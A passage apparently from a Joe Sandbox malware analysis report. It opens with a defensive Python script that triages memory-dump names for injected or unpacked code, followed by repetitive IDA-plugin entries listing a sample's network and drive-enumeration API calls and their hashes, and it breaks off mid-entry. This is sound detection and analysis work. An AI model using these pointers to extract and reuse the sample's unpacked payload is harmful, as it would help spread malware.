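    r"^([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]+)\.([0-9A-Fa-f]{16})\."
    r"([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp$")


@dataclass(frozen=True)
class DumpRegion:
    base: int
    protect: int
    mem_type: int

    @property
    def executable(self) -> bool:
        return bool(self.protect & EXEC_MASK)

    @property
    def writable(self) -> bool:
        return bool(self.protect & WRITE_MASK)

    @property
    def image_backed(self) -> bool:
        # The report's "based on PE: true/false" lines track this type value.
        return self.mem_type == MEM_IMAGE

    def describe(self) -> str:
        return (f"{self.base:#010x} "
                f"{PROTECT_NAMES.get(self.protect, hex(self.protect))} "
                f"{TYPE_NAMES.get(self.mem_type, hex(self.mem_type))}")


def parse_sdmp(name: str) -> DumpRegion:
    """Parse one identifier; raises ValueError on anything that is not an sdmp name."""
    m = SDMP_RE.match(name.strip())
    if m is None:
        raise ValueError(f"not an sdmp identifier: {name!r}")
    return DumpRegion(base=int(m.group(4), 16),
                      protect=int(m.group(5), 16),
                      mem_type=int(m.group(7), 16))


def triage(names) -> dict:
    """Map base address -> reasons that region deserves a look before the others."""
    findings = {}
    for name in names:
        r = parse_sdmp(name)
        reasons = []
        if r.executable and r.writable and r.image_backed:
            reasons.append("writable+executable pages inside the mapped PE "
                           "(section rights changed at runtime or RWX section)")
        if r.executable and not r.image_backed:
            reasons.append("executable code not backed by any PE image "
                           "(unpacked or injected payload)")
        if reasons:
            findings[r.base] = reasons
    return findings


# Constructed sample: four identifiers copied from the Memory Dump Source lists on this page
SAMPLE_DUMPS = [
    "00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1416835471.0000000007270000.00000040.00001000.00020000.00000000.sdmp",
]

if __name__ == "__main__":
    for n in SAMPLE_DUMPS:
        print(parse_sdmp(n).describe())
    for base, reasons in triage(SAMPLE_DUMPS).items():
        print(f"{base:#010x}: " + "; ".join(reasons))
```

On the page's own identifiers the header region at 0x00D90000 (PAGE_READWRITE) is left alone, the PE-backed code regions are flagged for runtime-changed section rights, and 0x07270000 is flagged as unbacked executable memory, which is the dump to carve first when looking for the unpacked payload.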
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: closesocket
                                                              • String ID: FD %s:%d sclose(%d)
                                                              • API String ID: 2781271927-3116021458
                                                              • Opcode ID: abfaf12bbc4153f36784ba0b046cdff67a1496ea75182d8b27b09ed3658f566c
                                                              • Instruction ID: 1a7f104c19f85fdbc70bb8fab0a7914abe1981a8f1df503f1400f0fee1960f38
                                                              • Opcode Fuzzy Hash: abfaf12bbc4153f36784ba0b046cdff67a1496ea75182d8b27b09ed3658f566c
                                                              • Instruction Fuzzy Hash: C2D05E22A1A2207B8A316A99BC48C5B6BA8DFC6F20B0A0D5DF84477208D2209C0183F7
                                                              APIs
                                                              • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,00E5B29E,?,00000000,?,?), ref: 00E5B0BA
                                                              • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,00E43C41,00000000), ref: 00E5B0C1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastconnect
                                                              • String ID:
                                                              • API String ID: 374722065-0
                                                              • Opcode ID: 463b56086d810b146f1cea033bf7772ced62e9c7279037ab2bb6fd3714b36377
                                                              • Instruction ID: e68f7d478fb2f8528411beb2756901b1af373277c27dcaf729b99db4af90f5c1
                                                              • Opcode Fuzzy Hash: 463b56086d810b146f1cea033bf7772ced62e9c7279037ab2bb6fd3714b36377
                                                              • Instruction Fuzzy Hash: F301D436304200DBCA205A688884FABB799FF89379F140F64FD78B31E1D726ED548752
                                                              APIs
                                                              • gethostname.WS2_32(00000000,00000040), ref: 00E44AA5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: gethostname
                                                              • String ID:
                                                              • API String ID: 144339138-0
                                                              • Opcode ID: 0eea15e65e803d0335a82db72c412f7c48d97f0d760382dc3fc5ac52ca5e0206
                                                              • Instruction ID: bed616e09e612f8d19f7bb279955388dd2e599f08d1523b67ed52452c227d52e
                                                              • Opcode Fuzzy Hash: 0eea15e65e803d0335a82db72c412f7c48d97f0d760382dc3fc5ac52ca5e0206
                                                              • Instruction Fuzzy Hash: EF51C0F07047018BE7309F25F94976376E4EF41319F14293CEA8AA66D1E774E884DB12
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 0727040F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1416835471.0000000007270000.00000040.00001000.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7270000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: aee7aae838a8a30d9bd5e0c23d7d1c54589420bb132174a3304b853dd4f9563b
                                                              • Instruction ID: 352faa3aec6ea96c2bc4d113f881af03ac05af08dcb722df300561293238fab7
                                                              • Opcode Fuzzy Hash: aee7aae838a8a30d9bd5e0c23d7d1c54589420bb132174a3304b853dd4f9563b
                                                              • Instruction Fuzzy Hash: 0021D3EB27C211BEB56291962B65AFB6B6DE6C7730B308437F403C1501E2F40A0D9132
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 0727040F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1416835471.0000000007270000.00000040.00001000.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7270000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: 3ee3b56365cb9b16c9e9688f14ef5a33cde91a11027075de840c4ed0cbca6c9f
                                                              • Instruction ID: b225c5c0f80f481a1f3c58c8b21bc59154cd6445dbe695d91ccff25c64c92a7c
                                                              • Opcode Fuzzy Hash: 3ee3b56365cb9b16c9e9688f14ef5a33cde91a11027075de840c4ed0cbca6c9f
                                                              • Instruction Fuzzy Hash: 7B1148E657D281AFA72242985B559FA7B6DEA8333473044ABF842C3142E3F40509D232
                                                              APIs
                                                              • getsockname.WS2_32(?,?,00000080), ref: 00E5AFD1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: getsockname
                                                              • String ID:
                                                              • API String ID: 3358416759-0
                                                              • Opcode ID: 7626577a2c48a4ca8d726de2a61bb860ac63b8c118d65032158d3e7998740f84
                                                              • Instruction ID: 3f2a6f8b31d8d50b2242defb70805ed6771a9dadd74a21a1241e53d890dfddb3
                                                              • Opcode Fuzzy Hash: 7626577a2c48a4ca8d726de2a61bb860ac63b8c118d65032158d3e7998740f84
                                                              • Instruction Fuzzy Hash: 1C119670908785D5EB268F18D4027F6B3F4EFD0329F109A18E9D952150F7325AC98BD2
                                                              APIs
                                                              • send.WS2_32(?,?,?,00000000,00000000,?), ref: 00E5A97F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: send
                                                              • String ID:
                                                              • API String ID: 2809346765-0
                                                              • Opcode ID: 2d9321c9837e7db2c59573ca40839617d82385e90d274fc9d96a2baa6da15b1e
                                                              • Instruction ID: 9674f5dc23a8ab97fc416c44b8566c9579068c556cb017afe227764d042d6f12
                                                              • Opcode Fuzzy Hash: 2d9321c9837e7db2c59573ca40839617d82385e90d274fc9d96a2baa6da15b1e
                                                              • Instruction Fuzzy Hash: 7501A776B007119FC6148F14E845B56B7A5EFC4721F0A8659EA982B361C331AC148BD1
                                                              APIs
                                                              • socket.WS2_32(?,00E5B280,00000000,-00000001,00000000,00E5B280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 00E5AF67
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: socket
                                                              • String ID:
                                                              • API String ID: 98920635-0
                                                              • Opcode ID: cb5cefe0a019ec232677582182c1f9705dc5c17be113ded68fe1e738c68cc6fb
                                                              • Instruction ID: 57863299faf723474477abbf87539cbcf5f62a8e905ddd711851973bbd6251b3
                                                              • Opcode Fuzzy Hash: cb5cefe0a019ec232677582182c1f9705dc5c17be113ded68fe1e738c68cc6fb
                                                              • Instruction Fuzzy Hash: 57E0EDB6B092216BD654DB18E844AABF369EFC4B21F055E59BC5467204C330AC548BF2
                                                              APIs
                                                              • closesocket.WS2_32(?,00E59422,?,?,?,?,?,?,?,?,?,?,?,w3,01224C60,00000000), ref: 00E5B04D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: closesocket
                                                              • String ID:
                                                              • API String ID: 2781271927-0
                                                              • Opcode ID: e48f50a5f563afcc360981e95335417584f101d11603f0435b84d44aede4f4a0
                                                              • Instruction ID: 14fe7a92247283db1d18dcbeb7fc66571866265a026de7d208c7a49b4546e839
                                                              • Opcode Fuzzy Hash: e48f50a5f563afcc360981e95335417584f101d11603f0435b84d44aede4f4a0
                                                              • Instruction Fuzzy Hash: 46D0C23430020197CA249A14C884A57772B7FD0715FA8DF6CE82C4A1D4CB3BCC4B8601
                                                              APIs
                                                              • ioctlsocket.WS2_32(?,8004667E,?,?,00DCAF56,?,00000001), ref: 00DF67FB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                               • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: ioctlsocket
                                                              • String ID:
                                                              • API String ID: 3577187118-0
                                                              • Opcode ID: 3c1d202289db0292a9aeb4baed872efe5245275bb227e71251d2b1d76f7019c1
                                                              • Instruction ID: 66806cfb78524afff404ec24cd778485ada8519ee7a2de58543acfda5f00e555
                                                              • Opcode Fuzzy Hash: 3c1d202289db0292a9aeb4baed872efe5245275bb227e71251d2b1d76f7019c1
                                                              • Instruction Fuzzy Hash: 65C012F1209201AFC60C4724D855B2EB6D9DB44255F01491CB04692180EA349450CB16
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                               • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID:
                                                              • API String ID: 2962429428-0
                                                              • Opcode ID: a4dbdb41ecd01cb83c4be642480951adefc6c715270b1e7eb7c10ac77b904fee
                                                              • Instruction ID: cf5df70d859998d2fc08cced15b181e0c20d539de8b8c798b18be567186a4d74
                                                              • Opcode Fuzzy Hash: a4dbdb41ecd01cb83c4be642480951adefc6c715270b1e7eb7c10ac77b904fee
                                                              • Instruction Fuzzy Hash: 8631C3B49093159FCB10EFB8C5846AEBBF4BF54308F01896DD898A7344E7349A84CF92
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1416799079.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7250000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 787eebbdf6aad2621cbf5881870028325fca27caf411ae549bc240a91409d6c1
                                                              • Instruction ID: e769e8be3f4b00c4304c12c93bd1a6e83e8acdc798ab3f0261141ac5db3bafad
                                                              • Opcode Fuzzy Hash: 787eebbdf6aad2621cbf5881870028325fca27caf411ae549bc240a91409d6c1
                                                              • Instruction Fuzzy Hash: D74123FB53C214ADE22295616F94AFB7B6EE7D7330B30846AFC03D6502E2F45A495231
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1416799079.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7250000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5eb921dcfd18dd33577ac8712bd4e8470c4f1444de69dd2dd356cf2b902c1b6f
                                                              • Instruction ID: 80445a70349d2e6973c21c932138e090d601b7d7fe38e6a0ad19338b4784dd83
                                                              • Opcode Fuzzy Hash: 5eb921dcfd18dd33577ac8712bd4e8470c4f1444de69dd2dd356cf2b902c1b6f
                                                              • Instruction Fuzzy Hash: 3E21B1EB17D104BDA12285A16F54AFB666EE6E7331F308436FC07E2602E2F45E491531
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1416799079.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7250000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 89be980a2df9e1a7342ea710fdbcb7377a010b363821119e1176d6b43324fc32
                                                              • Instruction ID: db05e3b695eb53fdef32cd35146865208232bbf2f6133338a1a4483ab65b6971
                                                              • Opcode Fuzzy Hash: 89be980a2df9e1a7342ea710fdbcb7377a010b363821119e1176d6b43324fc32
                                                              • Instruction Fuzzy Hash: 5831F3EB53D104ADE62285A15F246FA6B6EE6D7330B308076FC07D7603E2F45E495131
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1416799079.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7250000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 693dd6b232039de7f956d8b125eea5a11d9e8f93b9451273fcc41fd598ceafc9
                                                              • Instruction ID: 92d82f964e4a7deee8777e7c5f7eabe545d690ce2f5b9cdbbab995a21aaf412c
                                                              • Opcode Fuzzy Hash: 693dd6b232039de7f956d8b125eea5a11d9e8f93b9451273fcc41fd598ceafc9
                                                              • Instruction Fuzzy Hash: EE21EEEF539114ADA62285A16F646FB676EE6E7330F308476FC07E3A02E2F45E491131
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1416799079.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7250000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
